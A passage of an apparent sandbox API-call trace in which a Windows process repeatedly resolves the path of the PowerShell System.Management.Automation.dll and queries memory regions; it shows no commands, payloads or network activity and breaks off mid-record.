lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.861] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.862] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.862] VirtualQuery (in: lpAddress=0x10bb30, lpBuffer=0x10c9f0, dwLength=0x30 | out: lpBuffer=0x10c9f0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.863] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.863] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.864] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.864] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.864] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.865] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.865] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.866] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.866] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.866] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.867] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.867] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.867] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.868] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.868] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.868] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.868] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x38a23aeb, Data2=0x4608, Data3=0x4cd6, Data4=([0]=0x84, [1]=0xfe, [2]=0xcf, [3]=0x77, [4]=0xad, [5]=0x36, [6]=0x82, [7]=0x5f))) returned 0x0 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.870] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe95f37ad, Data2=0x3e5, Data3=0x4dc3, Data4=([0]=0x8b, [1]=0x9d, [2]=0x5, [3]=0x88, [4]=0xa5, [5]=0x3, [6]=0x53, [7]=0x9))) returned 0x0 [0108.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.881] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.882] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.883] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: lpBuffer=0x10c0e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.884] VirtualQuery (in: lpAddress=0x10b190, lpBuffer=0x10c050, dwLength=0x30 | out: lpBuffer=0x10c050*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.884] VirtualQuery (in: lpAddress=0x10b220, lpBuffer=0x10c0e0, dwLength=0x30 | out: 